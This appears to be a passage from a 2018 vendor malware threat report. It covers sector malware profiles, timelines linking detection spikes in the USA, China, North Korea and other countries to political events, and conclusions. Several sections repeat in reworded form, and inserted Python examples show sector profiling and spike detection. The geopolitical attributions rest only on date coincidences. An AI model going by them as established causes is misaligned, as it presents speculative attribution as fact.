The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples

Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims

Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data

Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures

NORTH AMERICA―

EUROPE―

ASIA―

REQUEST A DEMO Try Comodo Cybersecurity by speaking with

a security consultant to begin the process to set up a demo or proof-of-concept project

Contact us directly at +1 888-266-6361

copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC

VISIT COMODOCOM

Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom

Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772

Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin

Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190

countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more

than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing

millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day

The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential

threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine

learning-powered analytics artificial intelligence and human experts and insights to secure and protect

Comodo Cybersecurity customers business and public-sector partners and the public community

Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository

About Comodo Cybersecurity

Brought to you by

  • 1 Executive summary
    • 11 Overview
    • 12 New Trends
      • 121 Trojans jumped to the top of the malware list
      • 122 Cryptominers evolved into multifunctional malware
      • 123 Android malware skyrocketed in variety
      • 124 Geopolitical intelligence
          • 2 Trojans going on the offensive to hunt for confidential data
            • 21 The Most Widespread Trojan
            • 22 PowerShell-based attack with Emotet
            • 23 Flawed Ammyy RAT attack based on legitimate software
            • 24 The growth of Flawed Ammyy attacks for Q2
            • 25 Ammyy Admin dissemination around the world for Q2
              • 3 Cryptominer Evolution
                • Going Fileless Killing Competitors Crashing Systems
                • 31 BadShell attacks enterprises
                • 32 WinstarNssmMiner a system killer
                • 33 CoinMiner kills rivals
                • 34 CoinHive changes its skin
                • 35 Cryptocurrency clipboard hijacker intercepts transfers
                  • 4 Android Devices Under Siege
                    • 41 Spying Stealing Mining
                      • 411 KevDroid
                      • 412 Zoo Park
                      • 413 MikeSpy
                      • 414 Xloader
                      • 415 Stalker Spy
                      • 416 Mystery Bot
                      • 417 FakeSpy
                      • 418 RedAlert
                      • 419 Hero Rat
                      • 4110 Sonvpay
                      • 4111 CoinHive
                        • 42 Android Malware Catalogued by Month
                          • 421 April 2018
                          • 422 May 2018
                          • 423 June 2018
                              • 5 Malware in Q2 2018 The Big Picture
                                • 51 Strategic Threat Computer Worms
                                  • 511 Generic Worms
                                  • 512 Net Worms
                                  • 513 Email Worms
                                  • 514 p2p Worms
                                  • 515 IM Worms
                                    • 52 High Threat Malware
                                      • 521 Backdoors
                                      • 522 Viruses
                                      • 523 Trojans
                                      • 524 Exploits
                                        • 53 Medium Threat Malware
                                          • 531 Constructor
                                          • 532 Packers
                                          • 533 Email Flooder
                                          • 534 Virtual Tools
                                          • 535 Jokes
                                            • 54 Low Threat Malware Applications
                                              • 541 Applications
                                              • 542 Unwanted Applications
                                              • 543 Unsafe Applications
                                                  • 6 Vertical analysis
                                                  • 7 Geopolitical Intelligence
                                                    • 71 USA
                                                    • 72 China
                                                    • 73 South Korea
                                                    • 74 North Korea
                                                    • 75 Armenia
                                                    • 76 Belarus
                                                    • 77 Iraq
                                                    • 78 Ukraine
                                                    • 79 Croatia
                                                    • 710 Finland Russia USA
                                                      • 8 Conclusions

Global Threat Report Q2 2018 Edition

Page 61 of 73

6. Vertical analysis

In this section we examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details malware distributions for twenty-two vertical markets, from automotive to travel, across four dangerous malware types: backdoors, trojans, viruses and worms. For each vertical the diagram also lists the #1 malware family within that vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, which were the top detection not in just one but in multiple verticals, which makes them a current strategic threat across the world.


First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was originally created to harvest information about an infected host's FTP servers, but that it now also targets email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "clicker" to inflate the hit counts of websites, and that it has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo itself discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017. A caveat for defenders: "Kryptik" is a generic detection name that several antivirus engines apply to heavily packed or obfuscated trojans, so the behaviours listed above belong to payloads that have carried that label rather than to one codebase; a Kryptik alert should be triaged by unpacking and identifying the sample, not by assuming a single family.

Second, let's examine "Zbot", another name for the "Zeus" trojan, which has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has most often been used to steal financial information such as account numbers and passwords, via keystroke logging and form grabbing (capturing the contents of web forms inside the browser before they are encrypted). It has also been used to install ransomware, including CryptoLocker. Zbot is typically spread through drive-by downloads and email phishing, sometimes supported by a social-engineering scheme that falsely claims the target's computer is already infected with a virus and needs to be cleaned.

Two conclusions follow. First, trojans are dangerous malware found in every vertical and used for a wide variety of cyberattacks. Second, strategic analysis of this kind can be used to build a distinct malware profile for each vertical: cyber intelligence that clarifies which malware threats are primary for a given sector and lets defenders focus limited time and resources on them.
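As an added illustration of the profiling described above (example code written for this edition, not Comodo's own tooling or data): the function below takes per-detection records of (vertical, malware type, family) and, for each vertical, reports its top malware type and the #1 family within that type, as the infographic does. It goes one step beyond the report by also computing a lift score, the family's share inside the vertical divided by its share across all telemetry, so an analyst can tell whether a family is specific to that sector or simply everywhere. The detection records, vertical names and counts are constructed assumptions for the example, not report figures.

```python
"""Per-vertical malware profiles from detection telemetry.

Added example, not Comodo's code. The detection records below are
constructed for illustration; vertical names, family names and counts
are assumptions, not figures from the report.
"""
from collections import Counter, defaultdict

# Constructed telemetry: one (vertical, malware_type, family) tuple per detection.
SAMPLE_DETECTIONS = (
    [("government", "Trojan", "Zbot")] * 40
    + [("government", "Trojan", "Kryptik")] * 10
    + [("government", "Worm", "Generic")] * 15
    + [("transportation", "Trojan", "Zbot")] * 25
    + [("transportation", "Backdoor", "Generic")] * 5
    + [("retail", "Virus", "Sality")] * 30
    + [("retail", "Trojan", "Kryptik")] * 20
)


def build_profiles(detections):
    """Return {vertical: profile}.

    Each profile holds the vertical's top malware type (and its share of the
    vertical's detections), the #1 family within that type, and the family's
    lift: its share inside the vertical divided by its share across all
    detections. Lift near 1.0 means "as common here as anywhere"; a high lift
    marks a family that is disproportionately concentrated in this sector.
    """
    by_vertical = defaultdict(list)
    for vertical, mtype, family in detections:
        by_vertical[vertical].append((mtype, family))

    total = len(detections)
    global_family_counts = Counter(family for _, _, family in detections)

    profiles = {}
    for vertical, events in sorted(by_vertical.items()):
        type_counts = Counter(mtype for mtype, _ in events)
        top_type, top_type_n = type_counts.most_common(1)[0]

        # #1 family, counted only within the top malware type, as in the infographic.
        family_in_type = Counter(f for t, f in events if t == top_type)
        top_family = family_in_type.most_common(1)[0][0]

        share_in_vertical = Counter(f for _, f in events)[top_family] / len(events)
        share_global = global_family_counts[top_family] / total
        profiles[vertical] = {
            "top_type": top_type,
            "top_type_share": round(top_type_n / len(events), 3),
            "top_family": top_family,
            "lift": round(share_in_vertical / share_global, 2),
        }
    return profiles


def strategic_families(profiles, min_verticals=2):
    """Families that are #1 in at least `min_verticals` verticals: the
    criterion the report uses to call Kryptik and Zbot strategic threats."""
    hits = Counter(p["top_family"] for p in profiles.values())
    return sorted(f for f, n in hits.items() if n >= min_verticals)


if __name__ == "__main__":
    profiles = build_profiles(SAMPLE_DETECTIONS)
    for vertical, p in profiles.items():
        print(f"{vertical:15s} top type {p['top_type']:8s} "
              f"({p['top_type_share']:.0%})  #1 family {p['top_family']:8s} lift {p['lift']}")
    print("strategic (top in >= 2 verticals):", strategic_families(profiles))
```

With the sample data Zbot is #1 in both the government and transportation verticals and so is reported as strategic; its lift in transportation (about 1.9) is higher than in government (about 1.4), which is the kind of sector-specific weighting the report's "unique profile" idea is meant to capture.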


7. Geopolitical Intelligence

7.1 USA

This timeline displays the most dangerous malware types detected within the United States in spring 2018. The major spike on March 13 clearly stands out. What happened in the US on that day that might help explain the surge in malware activity? On March 13 President Donald Trump announced his choices for a new Secretary of State, Mike Pompeo, and a new CIA Director, Gina Haspel. In that light, one likely reason for the dramatic rise in detections is that intelligence agencies around the world suddenly received a raft of new collection requirements: requests for information about upcoming changes in US political, military and intelligence activity. Those agencies would then have set about fulfilling the requirements through computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.


7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. June 4 clearly stands out as the single most prominent day. The likely reason for this massive spike is that many intelligence services, both foreign and domestic, were busy trying to protect, or to collect, sensitive information relating to current events within China. Why June 4? That is the anniversary of the 1989 Tiananmen Square protests.


7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that forms the basis of intelligence reporting. This graph shows Comodo trojan detections in South Korea during Q2 2018. The highest single spikes coincided with the annual joint US-South Korean military exercises. That should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.


7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May Comodo saw a spike of well over ten times the usual number of detections. One plausible explanation is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to use a short period of political openness to better connect with the outside world. Comodo analysed the detected samples and identified them as Windows activation ("cracking") software and Chinese-made anti-censorship programs.


7.5 Armenia

All major geopolitical events today are bathed in malware, because nearly every activity, from social life to business, politics and national security, is now conducted online. This is especially true during a national crisis, when government and citizens alike are working overtime to gather new information, or to stop others from doing the same. This timeline provides ample evidence: Armenia's 2018 political revolution coincided with Comodo's largest detection of malware within that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that "information wants to be free". This timeline of Comodo's virus and trojan detections in Belarus in Q2 2018 offers evidence for that argument. On June 14, as the government in Minsk passed new legislation aimed at controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was used specifically to disseminate trojans, which were then leveraged for a real-world purpose: to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart of Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out, and both may be associated with electoral events. In mid-April Iraq was preparing for a national election, including the conundrum of how best to secure its electronic dimension. And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detections, and sometimes there may be several reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, the highest spike, on May 24, may have had multiple causes. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day and Ukraine's testing of new military weapons supplied by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in the capital, Kyiv, on May 26.


7.9 Croatia

Since the cyberattacks that targeted Estonia in 2007 it has been clear that cyberattacks can be used to punish not only individuals and enterprises but entire nations. In that context the massive spike in malware detections in Croatia on March 28 is interesting: it came just one day after the Russian government called Croatia's decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".


7.10 Finland, Russia, USA

Finally, let's look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day the press began reporting that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital, Helsinki. Geolocation of the virus activity showed that it took place almost exclusively in Vantaa, the municipality bordering Helsinki, where the summit was at that time expected to take place.
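The country sections above read spikes off daily detection charts by eye and then look for an event on or near that date. Here is the same procedure done mechanically, as an added example (not Comodo's code or telemetry): a day is flagged when its count exceeds a robust baseline of the median plus k times the median absolute deviation (MAD) over the preceding window, so that a single huge day does not inflate the baseline used for the days that follow, and each flagged day is then matched to the nearest entry in an event calendar within a tolerance of a few days (the Croatia case above is a one-day lag). The daily counts, the window and threshold values, and the event labels are all constructed assumptions for the illustration.

```python
"""Spike detection over daily detection counts, joined to an event calendar.

Added example, not Comodo's code. The daily counts, thresholds and event
labels below are constructed for illustration and are not report data.
"""
from datetime import date, timedelta
from statistics import median


def detect_spikes(daily_counts, window=14, k=5.0, min_excess=10):
    """Flag days whose count exceeds median + k * MAD of the preceding
    `window` days.

    daily_counts: {date: int}. Returns [(day, count, score)], where score is
    (count - median) / MAD. Median and MAD are used instead of mean and
    standard deviation so that one enormous day does not raise the baseline
    for the days after it. `min_excess` stops a near-flat baseline (tiny MAD)
    from turning ordinary noise into "spikes".
    """
    days = sorted(daily_counts)
    spikes = []
    for i in range(window, len(days)):
        history = [daily_counts[d] for d in days[i - window:i]]
        med = median(history)
        mad = median([abs(x - med) for x in history]) or 1.0  # guard MAD == 0
        count = daily_counts[days[i]]
        score = (count - med) / mad
        if score > k and count - med >= min_excess:
            spikes.append((days[i], count, round(score, 1)))
    return spikes


def nearest_event(day, events, max_lag_days=2):
    """Return (lag_days, label) for the event nearest `day` within the
    tolerance, or None. lag_days > 0 means the spike came after the event."""
    best = None
    for when, label in events:
        lag = (day - when).days
        if abs(lag) <= max_lag_days and (best is None or abs(lag) < abs(best[0])):
            best = (lag, label)
    return best


def annotate_spikes(daily_counts, events, **kwargs):
    """Combine the two steps: [(day, count, score, matched_event_or_None)]."""
    return [(day, count, score, nearest_event(day, events))
            for day, count, score in detect_spikes(daily_counts, **kwargs)]


# Constructed 30-day series for one country: a flat ~100/day baseline with
# a roughly tenfold spike on day 15 (June 4) and a smaller bump on day 25 (June 14).
START = date(2018, 5, 20)
SAMPLE_COUNTS = {
    START + timedelta(days=i): n
    for i, n in enumerate([
        98, 104, 101, 97, 110, 95, 103, 99, 106, 102, 100, 97, 105, 101,
        99, 930, 108, 100, 96, 103, 101, 107, 98, 102, 100, 150, 99, 104, 97, 101,
    ])
}

# Constructed event calendar (labels are hypothetical; dates chosen to show
# a same-day match and a one-day lag).
SAMPLE_EVENTS = [
    (date(2018, 6, 4), "hypothetical event A"),
    (date(2018, 6, 13), "hypothetical event B"),
]


if __name__ == "__main__":
    for day, count, score, event in annotate_spikes(SAMPLE_COUNTS, SAMPLE_EVENTS):
        print(f"{day}  count={count:4d}  score={score:6.1f}  event={event}")
```

Run stand-alone it reports two spikes: June 4 (count 930, matched to event A on the same day) and June 14 (count 150, matched to event B with a one-day lag). Note that June 5, the day after the big spike, is not flagged even though the 930 is now inside its window, which is the point of using the median and MAD rather than a mean and standard deviation.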


8. Conclusions

In Q2 Comodo Cybersecurity observed several significant new trends that are likely to strongly influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The increase in trojan malware last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks carried out in Q2 remain undetected, with their real impact to be revealed in quarters to come. Another significant fact is that trojans serve as a delivery vector for other types of malware. Together these facts point to a large surge in the infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in its persistence, and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools such as PowerShell in attacks are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets hold a variety of valuable information yet lack protection comparable to that on desktop systems, which presages new attacks and new mobile malware. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and to store confidential information (such as messenger conversations and private pictures), cybercriminals can anticipate rich pickings from compromising those devices. After a successful penetration, perpetrators profit by stealing money, selling confidential information, or blackmailing victims.

Moreover, given that the majority of trojans detected in Q2 were information stealers, we see another dangerous tendency: cybercriminals' accelerating shift toward hunting for confidential data.

Together these trends promise a heavy impact on the cybersecurity marketplace and on IT end users, changing the cybersecurity landscape and forcing IT security departments to update their security measures and probably to revamp their security strategy, policies and posture.

REQUEST A DEMO

Try Comodo Cybersecurity by speaking with a security consultant to begin the process of setting up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.

© 2018 ALL RIGHTS RESERVED. COMODO SECURITY SOLUTIONS, INC. VISIT COMODO.COM

NORTH AMERICA: Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States. Tel: +1 (888) 551 1531, Tel: +1 (888) 266 6361, Int: +1 (703) 581 6361, Fax: +1 (973) 777 4394, sales@comodo.com

EUROPE: Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania. Tel: +40 332 806 772

ASIA: Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel: +91 44 4562 2800, www.comodo.co.in

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

About Comodo Cybersecurity

Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group, Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.

                                                    • 710 Finland Russia USA
                                                      • 8 Conclusions

Global Threat Report Q2 2018 Edition

Page 62 of 73

First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites, and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015, Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a virus and needs to be cleaned.

In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks; second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.

7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking – commonly called cyber espionage – which today takes place on a far greater scale than the public realizes.

7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services – both foreign and domestic – were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.

7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers; spies collect data for intelligence reports.

7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.

7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities – from social activities to business, politics or national security affairs – are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information – or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.

7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's virus and trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.

7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.

7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection – and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.

7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".

7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike – by far – occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa – precisely where the summit was scheduled to take place.
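
The spike-reading that runs through section 7, as an added example that is not part of the Comodo report: each subsection reads a "spike" off a per-country detection timeline by eye, the North Korea case naming it as "well over ten times" the usual number of detections. The Python below turns that reading into a rule an analyst can run over any daily detection series, flagging days whose count exceeds a chosen multiple of the median of the preceding days, and reporting the single busiest day the way each chart caption does. The daily counts are constructed for illustration, not Comodo telemetry, and the 7-day window and 10x factor are assumptions chosen here, not values from the report.

```python
"""Spike detection over a daily malware-detection time series.

Added example (not the report's code). A day is a spike when its count
exceeds `factor` times the median of the preceding `window` days. The
median, not the mean, is the baseline so that one earlier spike inside the
window does not inflate the baseline and hide a later one.
"""
from datetime import date, timedelta
from statistics import median
from typing import List, Tuple

Day = Tuple[date, int]  # (calendar day, number of detections that day)

# Constructed daily detection counts for one country (not Comodo telemetry):
# ten quiet days, one large spike, then a smaller bump five days later.
_COUNTS = [22, 25, 19, 27, 24, 21, 26, 23, 25, 20,
           300,
           24, 22, 26, 21, 100, 23, 25, 24, 22, 26]
SAMPLE_SERIES: List[Day] = [
    (date(2018, 5, 1) + timedelta(days=i), c) for i, c in enumerate(_COUNTS)
]


def detect_spikes(series: List[Day], window: int = 7,
                  factor: float = 10.0) -> List[Tuple[date, int, float]]:
    """Return (day, count, ratio) for every day whose count is more than
    `factor` times the median count of the `window` days before it.

    The first `window` days have no baseline and are never flagged.
    `window` and `factor` are assumed defaults; the report's "well over ten
    times the usual number" corresponds to factor=10.
    """
    if window < 1:
        raise ValueError("window must be at least one day")
    spikes = []
    for i in range(window, len(series)):
        baseline = median(count for _, count in series[i - window:i])
        day, count = series[i]
        if baseline <= 0:
            # Silence in the whole window: any activity is out of the
            # ordinary, but there is no finite ratio to report.
            if count > 0:
                spikes.append((day, count, float("inf")))
            continue
        ratio = count / baseline
        if ratio > factor:
            spikes.append((day, count, ratio))
    return spikes


def busiest_day(series: List[Day]) -> Day:
    """The single most prominent day, as each chart caption reads it."""
    return max(series, key=lambda d: d[1])


def spike_dates(series: List[Day], **kwargs) -> List[date]:
    """Only the flagged dates, ready to be matched against a news timeline."""
    return [day for day, _, _ in detect_spikes(series, **kwargs)]


if __name__ == "__main__":
    for day, count, ratio in detect_spikes(SAMPLE_SERIES):
        print(f"{day}: {count} detections, {ratio:.1f}x the 7-day median")
    print("busiest day:", busiest_day(SAMPLE_SERIES))
    # A looser threshold also catches the smaller bump on 2018-05-16.
    print("at 3x:", spike_dates(SAMPLE_SERIES, factor=3))
```

Using the median rather than the mean as the baseline keeps one spike from hiding the next: the 300-detection day sits inside the window when the 100-detection day is scored, yet the baseline stays near 24. With the 10x rule only the first day is flagged; at 3x both are, which is the kind of threshold choice an analyst settles before matching flagged dates against the news events the report cites.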

8 Conclusions

In Q2, Comodo Cybersecurity observed several significant new trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infections of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence, and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.


North America: Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States. Tel: +1 (888) 551 1531, Tel: +1 (888) 266 6361, Int: +1 (703) 581 6361, Fax: +1 (973) 777 4394. sales@comodo.com

Europe: Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania. Tel: +40 332 806 772

